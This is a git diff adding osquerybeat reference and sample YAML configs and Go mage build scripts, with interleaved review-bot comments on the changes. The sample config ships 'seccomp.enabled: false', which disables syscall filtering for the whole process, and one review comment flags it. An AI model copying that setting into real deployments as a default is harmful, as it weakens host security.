+ #ssl.verification_mode: full + + # List of supported/valid TLS versions. By default all TLS versions from 1.1 + # up to 1.3 are enabled. + #ssl.supported_protocols: [TLSv1.1, TLSv1.2, TLSv1.3] + + # List of root certificates for HTTPS server verifications + #ssl.certificate_authorities: ["/etc/pki/root/ca.pem"] + + # Certificate for SSL client authentication + #ssl.certificate: "/etc/pki/client/cert.pem" + + # Client certificate key + #ssl.key: "/etc/pki/client/cert.key" + + # Optional passphrase for decrypting the certificate key. 
+ #ssl.key_passphrase: '' + + # Configure cipher suites to be used for SSL connections + #ssl.cipher_suites: [] + + # Configure curve types for ECDHE-based cipher suites + #ssl.curve_types: [] + + # Configure what types of renegotiation are supported. Valid options are + # never, once, and freely. Default is never. + #ssl.renegotiation: never + + # Configure a pin that can be used to do extra validation of the verified certificate chain, + # this allow you to ensure that a specific certificate is used to validate the chain of trust. + # + # The pin is a base64 encoded string of the SHA-256 fingerprint. + #ssl.ca_sha256: "" + + +# ================================== Logging =================================== + +# There are four options for the log output: file, stderr, syslog, eventlog +# The file output is the default. + +# Sets log level. The default log level is info. +# Available log levels are: error, warning, info, debug +#logging.level: info + +# Enable debug output for selected components. To enable all selectors use ["*"] +# Other available selectors are "beat", "publisher", "service" +# Multiple selectors can be chained. +#logging.selectors: [ ] + +# Send all logging output to stderr. The default is false. +#logging.to_stderr: false + +# Send all logging output to syslog. The default is false. +#logging.to_syslog: false + +# Send all logging output to Windows Event Logs. The default is false. +#logging.to_eventlog: false + +# If enabled, Osquerybeat periodically logs its internal metrics that have changed +# in the last period. For each metric that changed, the delta from the value at +# the beginning of the period is logged. Also, the total values for +# all non-zero internal metrics are logged on shutdown. The default is true. +#logging.metrics.enabled: true + +# The period after which to log the internal metrics. The default is 30s. +#logging.metrics.period: 30s + +# Logging to rotating files. 
Set logging.to_files to false to disable logging to +# files. +logging.to_files: true +logging.files: + # Configure the path where the logs are written. The default is the logs directory + # under the home path (the binary location). + #path: /var/log/osquerybeat + + # The name of the files where the logs are written to. + #name: osquerybeat + + # Configure log file size limit. If limit is reached, log file will be + # automatically rotated + #rotateeverybytes: 10485760 # = 10MB + + # Number of rotated log files to keep. Oldest files will be deleted first. + #keepfiles: 7 + + # The permissions mask to apply when rotating log files. The default value is 0600. + # Must be a valid Unix-style file permissions mask expressed in octal notation. + #permissions: 0600 + + # Enable log file rotation on time intervals in addition to size-based rotation. + # Intervals must be at least 1s. Values of 1m, 1h, 24h, 7*24h, 30*24h, and 365*24h + # are boundary-aligned with minutes, hours, days, weeks, months, and years as + # reported by the local system clock. All other intervals are calculated from the + # Unix epoch. Defaults to disabled. + #interval: 0 + + # Rotate existing logs on startup rather than appending to the existing + # file. Defaults to true. + # rotateonstartup: true + +# Set to true to log messages in JSON format. +#logging.json: false + +# Set to true, to log messages with minimal required Elastic Common Schema (ECS) +# information. Recommended to use in combination with `logging.json=true` +# Defaults to false. +#logging.ecs: false + +# ============================= X-Pack Monitoring ============================== +# Osquerybeat can export internal metrics to a central Elasticsearch monitoring +# cluster. This requires xpack monitoring to be enabled in Elasticsearch. The +# reporting is disabled by default. + +# Set to true to enable the monitoring reporter. 
+#monitoring.enabled: false + +# Sets the UUID of the Elasticsearch cluster under which monitoring data for this +# Osquerybeat instance will appear in the Stack Monitoring UI. If output.elasticsearch +# is enabled, the UUID is derived from the Elasticsearch cluster referenced by output.elasticsearch. +#monitoring.cluster_uuid: + +# Uncomment to send the metrics to Elasticsearch. Most settings from the +# Elasticsearch output are accepted here as well. +# Note that the settings should point to your Elasticsearch *monitoring* cluster. +# Any setting that is not set is automatically inherited from the Elasticsearch +# output configuration, so if you have the Elasticsearch output configured such +# that it is pointing to your Elasticsearch monitoring cluster, you can simply +# uncomment the following line. +#monitoring.elasticsearch: + + # Array of hosts to connect to. + # Scheme and port can be left out and will be set to the default (http and 9200) + # In case you specify and additional path, the scheme is required: http://localhost:9200/path + # IPv6 addresses should always be defined as: https://[2001:db8::1]:9200 + #hosts: ["localhost:9200"] + + # Set gzip compression level. + #compression_level: 0 + + # Protocol - either `http` (default) or `https`. + #protocol: "https" + + # Authentication credentials - either API key or username/password. + #api_key: "id:api_key" + #username: "beats_system" + #password: "changeme" + + # Dictionary of HTTP parameters to pass within the URL with index operations. + #parameters: + #param1: value1 + #param2: value2 + + # Custom HTTP headers to add to each request + #headers: + # X-My-Header: Contents of the header + + # Proxy server url + #proxy_url: http://proxy:3128 + + # The number of times a particular Elasticsearch index operation is attempted. If + # the indexing operation doesn't succeed after this many retries, the events are + # dropped. The default is 3. 
+ #max_retries: 3 + + # The maximum number of events to bulk in a single Elasticsearch bulk API index request. + # The default is 50. + #bulk_max_size: 50 + + # The number of seconds to wait before trying to reconnect to Elasticsearch + # after a network error. After waiting backoff.init seconds, the Beat + # tries to reconnect. If the attempt fails, the backoff timer is increased + # exponentially up to backoff.max. After a successful connection, the backoff + # timer is reset. The default is 1s. + #backoff.init: 1s + + # The maximum number of seconds to wait before attempting to connect to + # Elasticsearch after a network error. The default is 60s. + #backoff.max: 60s + + # Configure HTTP request timeout before failing an request to Elasticsearch. + #timeout: 90 + + # Use SSL settings for HTTPS. + #ssl.enabled: true + + # Controls the verification of certificates. Valid values are: + # * full, which verifies that the provided certificate is signed by a trusted + # authority (CA) and also verifies that the server's hostname (or IP address) + # matches the names identified within the certificate. + # * strict, which verifies that the provided certificate is signed by a trusted + # authority (CA) and also verifies that the server's hostname (or IP address) + # matches the names identified within the certificate. If the Subject Alternative + # Name is empty, it returns an error. + # * certificate, which verifies that the provided certificate is signed by a + # trusted authority (CA), but does not perform any hostname verification. + # * none, which performs no verification of the server's certificate. This + # mode disables many of the security benefits of SSL/TLS and should only be used + # after very careful consideration. It is primarily intended as a temporary + # diagnostic mechanism when attempting to resolve TLS errors; its use in + # production environments is strongly discouraged. + # The default value is full. 
+ #ssl.verification_mode: full + + # List of supported/valid TLS versions. By default all TLS versions from 1.1 + # up to 1.3 are enabled. + #ssl.supported_protocols: [TLSv1.1, TLSv1.2, TLSv1.3] + + # List of root certificates for HTTPS server verifications + #ssl.certificate_authorities: ["/etc/pki/root/ca.pem"] + + # Certificate for SSL client authentication + #ssl.certificate: "/etc/pki/client/cert.pem" + + # Client certificate key + #ssl.key: "/etc/pki/client/cert.key" + + # Optional passphrase for decrypting the certificate key. + #ssl.key_passphrase: '' + + # Configure cipher suites to be used for SSL connections + #ssl.cipher_suites: [] + + # Configure curve types for ECDHE-based cipher suites + #ssl.curve_types: [] + + # Configure what types of renegotiation are supported. Valid options are + # never, once, and freely. Default is never. + #ssl.renegotiation: never + + # Configure a pin that can be used to do extra validation of the verified certificate chain, + # this allow you to ensure that a specific certificate is used to validate the chain of trust. + # + # The pin is a base64 encoded string of the SHA-256 fingerprint. + #ssl.ca_sha256: "" + + # Enable Kerberos support. Kerberos is automatically enabled if any Kerberos setting is set. + #kerberos.enabled: true + + # Authentication type to use with Kerberos. Available options: keytab, password. + #kerberos.auth_type: password + + # Path to the keytab file. It is used when auth_type is set to keytab. + #kerberos.keytab: /etc/elastic.keytab + + # Path to the Kerberos configuration. + #kerberos.config_path: /etc/krb5.conf + + # Name of the Kerberos user. + #kerberos.username: elastic + + # Password of the Kerberos user. It is used when auth_type is set to password. + #kerberos.password: changeme + + # Kerberos realm. + #kerberos.realm: ELASTIC + + #metrics.period: 10s + #state.period: 1m + +# The `monitoring.cloud.id` setting overwrites the `monitoring.elasticsearch.hosts` +# setting. 
You can find the value for this setting in the Elastic Cloud web UI. +#monitoring.cloud.id: + +# The `monitoring.cloud.auth` setting overwrites the `monitoring.elasticsearch.username` +# and `monitoring.elasticsearch.password` settings. The format is `:`. +#monitoring.cloud.auth: + +# =============================== HTTP Endpoint ================================ + +# Each beat can expose internal metrics through a HTTP endpoint. For security +# reasons the endpoint is disabled by default. This feature is currently experimental. +# Stats can be access through http://localhost:5066/stats . For pretty JSON output +# append ?pretty to the URL. + +# Defines if the HTTP endpoint is enabled. +#http.enabled: false + +# The HTTP endpoint will bind to this hostname, IP address, unix socket or named pipe. +# When using IP addresses, it is recommended to only use localhost. +#http.host: localhost + +# Port on which the HTTP endpoint will bind. Default is 5066. +#http.port: 5066 + +# Define which user should be owning the named pipe. +#http.named_pipe.user: + +# Define which the permissions that should be applied to the named pipe, use the Security +# Descriptor Definition Language (SDDL) to define the permission. This option cannot be used with +# `http.user`. +#http.named_pipe.security_descriptor: + +# ============================== Process Security ============================== + +# Enable or disable seccomp system call filtering on Linux. Default is enabled. +#seccomp.enabled: true + +# ============================== Instrumentation =============================== + +# Instrumentation support for the osquerybeat. +#instrumentation: + # Set to true to enable instrumentation of osquerybeat. + #enabled: false + + # Environment in which osquerybeat is running on (eg: staging, production, etc.) + #environment: "" + + # APM Server hosts to report instrumentation results to. + #hosts: + # - http://localhost:8200 + + # API Key for the APM Server(s). 
+ # If api_key is set then secret_token will be ignored. + #api_key: + + # Secret token for the APM Server(s). + #secret_token: + + # Enable profiling of the server, recording profile samples as events. + # + # This feature is experimental. + #profiling: + #cpu: + # Set to true to enable CPU profiling. + #enabled: false + #interval: 60s + #duration: 10s + #heap: + # Set to true to enable heap profiling. + #enabled: false + #interval: 60s + +# ================================= Migration ================================== + +# This allows to enable 6.7 migration aliases +#migration.6_to_7.enabled: false + diff --git a/x-pack/osquerybeat/osquerybeat.yml b/x-pack/osquerybeat/osquerybeat.yml new file mode 100644 index 00000000000..482ca5324fa --- /dev/null +++ b/x-pack/osquerybeat/osquerybeat.yml 
@@ -0,0 +1,177 @@ +################### Osquerybeat Configuration Example ######################### + +############################# Osquerybeat ###################################### + +osquerybeat: +# inputs: +# - type: osquery +# streams: +# - id: "E169F085-AC8B-48AF-9355-D2977030CE24" +# query: "select * from users" +# - id: "CFDE1EAA-0C6C-4D19-9EEC-45802B2A8C01" +# query: "select * from processes" +# interval: 1m + +# ============================== Process Security ============================== +# Disable seccomp system call filtering on Linux. +# Otherwise osquerybeat can't fork osqueryd with error: Failed to start osqueryd process: fork/exec ./osqueryd: operation not permitted +seccomp.enabled: false + +# ================================== General =================================== + +# The name of the shipper that publishes the network data. It can be used to group +# all the transactions sent by a single shipper in the web interface. +#name: + +# The tags of the shipper are included in their own field with each +# transaction published. +#tags: ["service-X", "web-tier"] + +# Optional fields that you can specify to add additional information to the +# output. +#fields: +# env: staging + +# ================================= Dashboards ================================= +# These settings control loading the sample dashboards to the Kibana index. Loading +# the dashboards is disabled by default and can be enabled either by setting the +# options here or by using the `setup` command. +#setup.dashboards.enabled: false + +# The URL from where to download the dashboards archive. By default this URL +# has a value which is computed based on the Beat name and version. For released +# versions, this URL points to the dashboard archive on the artifacts.elastic.co +# website. +#setup.dashboards.url: + +# =================================== Kibana =================================== + +# Starting with Beats version 6.0.0, the dashboards are loaded via the Kibana API. 
+# This requires a Kibana endpoint configuration. +setup.kibana: + + # Kibana Host + # Scheme and port can be left out and will be set to the default (http and 5601) + # In case you specify and additional path, the scheme is required: http://localhost:5601/path + # IPv6 addresses should always be defined as: https://[2001:db8::1]:5601 + #host: "localhost:5601" + + # Kibana Space ID + # ID of the Kibana Space into which the dashboards should be loaded. By default, + # the Default Space will be used. + #space.id: + +# =============================== Elastic Cloud ================================ + +# These settings simplify using Osquerybeat with the Elastic Cloud (https://cloud.elastic.co/). + +# The cloud.id setting overwrites the `output.elasticsearch.hosts` and +# `setup.kibana.host` options. +# You can find the `cloud.id` in the Elastic Cloud web UI. +#cloud.id: + +# The cloud.auth setting overwrites the `output.elasticsearch.username` and +# `output.elasticsearch.password` settings. The format is `:`. +#cloud.auth: + +# ================================== Outputs =================================== + +# Configure what output to use when sending the data collected by the beat. + +# ---------------------------- Elasticsearch Output ---------------------------- +output.elasticsearch: + # Array of hosts to connect to. + hosts: ["localhost:9200"] + + # Protocol - either `http` (default) or `https`. + #protocol: "https" + + # Authentication credentials - either API key or username/password. + #api_key: "id:api_key" + #username: "elastic" + #password: "changeme" + +# ------------------------------ Logstash Output ------------------------------- +#output.logstash: + # The Logstash hosts + #hosts: ["localhost:5044"] + + # Optional SSL. By default is off. 
+ # List of root certificates for HTTPS server verifications + #ssl.certificate_authorities: ["/etc/pki/root/ca.pem"] + + # Certificate for SSL client authentication + #ssl.certificate: "/etc/pki/client/cert.pem" + + # Client Certificate Key + #ssl.key: "/etc/pki/client/cert.key" + +# ================================= Processors ================================= + +# Configure processors to enhance or manipulate events generated by the beat. + +processors: + - add_host_metadata: ~ + - add_cloud_metadata: ~ + + +# ================================== Logging =================================== + +# Sets log level. The default log level is info. +# Available log levels are: error, warning, info, debug +#logging.level: debug + +# At debug level, you can selectively enable logging only for some components. +# To enable all selectors use ["*"]. Examples of other selectors are "beat", +# "publisher", "service". +#logging.selectors: ["*"] + +# ============================= X-Pack Monitoring ============================== +# Osquerybeat can export internal metrics to a central Elasticsearch monitoring +# cluster. This requires xpack monitoring to be enabled in Elasticsearch. The +# reporting is disabled by default. + +# Set to true to enable the monitoring reporter. +#monitoring.enabled: false + +# Sets the UUID of the Elasticsearch cluster under which monitoring data for this +# Osquerybeat instance will appear in the Stack Monitoring UI. If output.elasticsearch +# is enabled, the UUID is derived from the Elasticsearch cluster referenced by output.elasticsearch. +#monitoring.cluster_uuid: + +# Uncomment to send the metrics to Elasticsearch. Most settings from the +# Elasticsearch output are accepted here as well. +# Note that the settings should point to your Elasticsearch *monitoring* cluster. 
+# Any setting that is not set is automatically inherited from the Elasticsearch +# output configuration, so if you have the Elasticsearch output configured such +# that it is pointing to your Elasticsearch monitoring cluster, you can simply +# uncomment the following line. +#monitoring.elasticsearch: + +# ============================== Instrumentation =============================== + +# Instrumentation support for the osquerybeat. +#instrumentation: + # Set to true to enable instrumentation of osquerybeat. + #enabled: false + + # Environment in which osquerybeat is running on (eg: staging, production, etc.) + #environment: "" + + # APM Server hosts to report instrumentation results to. + #hosts: + # - http://localhost:8200 + + # API Key for the APM Server(s). + # If api_key is set then secret_token will be ignored. + #api_key: + + # Secret token for the APM Server(s). + #secret_token: + + +# ================================= Migration ================================== + +# This allows to enable 6.7 migration aliases +#migration.6_to_7.enabled: true + diff --git a/x-pack/osquerybeat/scripts/mage/config.go b/x-pack/osquerybeat/scripts/mage/config.go new file mode 100644 index 00000000000..1d3e773d602 --- /dev/null +++ b/x-pack/osquerybeat/scripts/mage/config.go 
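Review bot: The shipped default sets `seccomp.enabled: false`, which turns off Linux system call filtering for the whole Beat process, not only for the osqueryd fork that the comment says motivates it. The reference config in this same change still documents "Default is enabled", so the two files disagree about the effective default. If the stock policy is what blocks fork/exec, a narrower option would be to keep seccomp on and give osquerybeat a policy that permits the calls needed to start osqueryd; whether that is practical depends on policy registration code not visible in this hunk. At minimum the comment should state the trade-off, for example `# NOTE: this removes syscall filtering for the Beat itself; re-enable once a policy that permits fork/exec of osqueryd is available.`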
@@ -0,0 +1,23 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package mage
+
+import (
+ devtools "github.com/elastic/beats/v7/dev-tools/mage"
+)
+
+// XPackConfigFileParams returns the configuration of sample and reference configuration data.
+func XPackConfigFileParams() devtools.ConfigFileParams {
+ p := devtools.DefaultConfigFileParams()
+ p.Templates = append(p.Templates, "_meta/config/*.tmpl")
+ p.ExtraVars = map[string]interface{}{
+ "ExcludeConsole": false,
+ "ExcludeFileOutput": true,
+ "ExcludeKafka": true,
+ "ExcludeRedis": true,
+ "UseDockerMetadataProcessor": false,
+ }
+ return p
+}
diff --git a/x-pack/osquerybeat/scripts/mage/distro.go b/x-pack/osquerybeat/scripts/mage/distro.go
new file mode 100644
index 00000000000..e91cad2a3f5
--- /dev/null
+++ b/x-pack/osquerybeat/scripts/mage/distro.go
@@ -0,0 +1,163 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package mage + +import ( + "errors" + "fmt" + "io/ioutil" + "log" + "os" + "path/filepath" + "strings" + + devtools "github.com/elastic/beats/v7/dev-tools/mage" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/distro" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/fetch" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/fileutil" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/hash" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/tar" +) + +// FetchOsqueryDistros fetches Osquery official distros as a part of the build +func FetchOsqueryDistros() error { + osnames := osNames(devtools.Platforms) + log.Printf("Fetch Osquery distros for %v", osnames) + + for _, osname := range osnames { + spec, err := distro.GetSpec(osname) + if err != nil { + return err + } + + fetched, err := checkCacheAndFetch(osname, spec) + if err != nil { + return err + } + + ifp := spec.DistroFilepath(distro.DataInstallDir) + installFileExists, eerr := fileutil.FileExists(ifp) + if eerr != nil { + log.Printf("Failed to check if %s exists, %v", ifp, err) + } + // If the new distro is fetched extract osqueryd if allowed according to the spec + // Currently the only supported is tar.gz extraction. + // There is no good Go library for extraction the cpio compressed "Payload" from Mac OS X .pkg, + // the few that I tried are limited and do not work. Maybe something to write for fun when time. + // The MSI is tricky as well to do the crossplatform extraction, no good Go library. + // So for Mac OS and Winderz the whole distro package is included and extracted + // on the first run on the platform for now. 
+ if fetched || !installFileExists { + err = extractOrCopy(osname, spec) + if err != nil { + return err + } + } + } + return nil +} + +func osNames(platforms devtools.BuildPlatformList) []string { + mp := make(map[string]struct{}) + + for _, platform := range platforms { + name := platform.Name + if idx := strings.Index(name, "/"); idx != -1 { + name = name[:idx] + } + mp[name] = struct{}{} + } + + res := make([]string, 0, len(mp)) + for name := range mp { + res = append(res, name) + } + return res +} + +func checkCacheAndFetch(osname string, spec distro.Spec) (fetched bool, err error) { + dir := distro.DataCacheDir + if err = os.MkdirAll(dir, 0750); err != nil { + return false, fmt.Errorf("failed to create dir %v, %w", dir, err) + } + + var fileHash string + url := spec.URL(osname) + fp := spec.DistroFilepath(dir) + specHash := spec.SHA256Hash + + // Check if file already exists in the cache + f, err := os.Open(fp) + if err != nil { + if !os.IsNotExist(err) { + return false, err + } + } + + // File exists, check hash + if f != nil { + log.Print("Cached file found: ", fp) + fileHash, err = hash.Calculate(f, nil) + f.Close() + if err != nil { + return + } + + if fileHash == specHash { + log.Printf("Hash match, file: %s, hash: %s", fp, fileHash) + return + } + + log.Printf("Hash mismatch, expected: %s, got: %s.", specHash, fileHash) + } + + fileHash, err = fetch.Download(url, fp) + if err != nil { + log.Printf("File %s fetch failed, err: %v", url, err) + return + } + + if fileHash == specHash { + log.Printf("Hash match, file: %s, hash: %s", fp, fileHash) + return true, nil + } + log.Printf("Hash mismatch, expected: %s, got: %s. 
Fetch distro %s.", specHash, fileHash, url) + + return false, errors.New("osquery distro hash mismatch") +} + +func extractOrCopy(osname string, spec distro.Spec) error { + dir := distro.DataInstallDir + if err := os.MkdirAll(dir, 0750); err != nil { + return fmt.Errorf("failed to create dir %v, %w", dir, err) + } + + src := spec.DistroFilepath(distro.DataCacheDir) + + // Include the official osquery msi installer for windows for now + // until we figure out a better way to crack it open during the build + if !spec.Extract { + dst := spec.DistroFilepath(dir) + log.Printf("Copy file %s to %s", src, dst) + return devtools.Copy(src, dst) + } + + // Extract osqueryd + if strings.HasSuffix(src, ".tar.gz") { + tmpdir, err := ioutil.TempDir(distro.DataDir, "") + if err != nil { + return err + } + defer os.RemoveAll(tmpdir) + + osdp := distro.OsquerydDistroPath() + if err := tar.ExtractFile(src, tmpdir, osdp); err != nil { + return err + } + + return devtools.Copy(filepath.Join(tmpdir, osdp), distro.OsquerydPath(dir)) + } + return fmt.Errorf("unsupported file: %s", src) +} diff --git a/x-pack/osquerybeat/scripts/mage/package.go b/x-pack/osquerybeat/scripts/mage/package.go new file mode 100644 index 00000000000..e91def855a7 --- /dev/null +++ b/x-pack/osquerybeat/scripts/mage/package.go 
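Review bot: In FetchOsqueryDistros the branch that handles a failed existence check logs `err`, which is nil at that point, instead of `eerr`, so the real cause is never printed; it should read `log.Printf("Failed to check if %s exists, %v", ifp, eerr)`. The error is then dropped and the code falls through to extractOrCopy with `installFileExists` false, which may be intended as best effort but deserves a one-line comment saying so. In checkCacheAndFetch, a download whose SHA-256 does not match `spec.SHA256Hash` is left in the cache directory. The next run re-hashes it, so it is not trusted, but calling `os.Remove(fp)` before returning the mismatch error would keep an unverified artifact from lingering on the build host.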
@@ -0,0 +1,24 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package mage
+
+import (
+ "path/filepath"
+
+ devtools "github.com/elastic/beats/v7/dev-tools/mage"
+ "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/distro"
+)
+
+func CustomizePackaging() {
+ for _, args := range devtools.Packages {
+ distFile := distro.OsquerydDistroPlatformFilename(args.OS)
+
+ packFile := devtools.PackageFile{
+ Mode: 0644,
+ Source: filepath.Join(distro.DataInstallDir, distFile),
+ }
+ args.Spec.Files[distFile] = packFile
+ }
+}
diff --git a/x-pack/osquerybeat/scripts/mage/update.go b/x-pack/osquerybeat/scripts/mage/update.go
new file mode 100644
index 00000000000..468bdafbe0f
--- /dev/null
+++ b/x-pack/osquerybeat/scripts/mage/update.go
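Review bot: `Mode: 0644` in `CustomizePackaging` is applied to whatever `distro.OsquerydDistroPlatformFilename(args.OS)` names, and on platforms where that is presumably the extracted `osqueryd` binary rather than the Windows installer, the packaged file would carry no execute bit and could not be launched after install. The helper is not visible here, so this should be confirmed, but if it holds the mode should be chosen per file, for example an executable mode without world access such as `0750` for the binary and `0644` only for the installer. The map write `args.Spec.Files[distFile] = packFile` also assumes `Spec.Files` is non-nil for every entry of `devtools.Packages`. The exported function has no doc comment; `// CustomizePackaging adds the platform-specific osquery distribution file from distro.DataInstallDir to every package spec.` would do.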
@@ -0,0 +1,48 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package mage
+
+import (
+ "github.com/magefile/mage/mg"
+
+ devtools "github.com/elastic/beats/v7/dev-tools/mage"
+)
+
+// Update target namespace.
+type Update mg.Namespace
+
+// Aliases stores aliases for the targets.
+var Aliases = map[string]interface{}{
+ "update": Update.All,
+}
+
+// All updates all generated content.
+func (Update) All() {
+ mg.Deps(Update.Fields, Update.IncludeFields, Update.Config, Update.FieldDocs)
+}
+
+// Config generates both the short and reference configs.
+func (Update) Config() error {
+ return devtools.Config(devtools.ShortConfigType|devtools.ReferenceConfigType, XPackConfigFileParams(), ".")
+}
+
+// Fields generates a fields.yml for the Beat.
+func (Update) Fields() error {
+ return devtools.GenerateFieldsYAML()
+}
+
+// FieldDocs collects all fields by provider and generates documentation for them.
+func (Update) FieldDocs() error {
+ mg.Deps(Update.Fields)
+
+ return devtools.Docs.FieldDocs("fields.yml")
+}
+
+// IncludeFields generates include/fields.go by provider.
+func (Update) IncludeFields() error {
+ mg.Deps(Update.Fields)
+
+ return devtools.GenerateAllInOneFieldsGo()
+}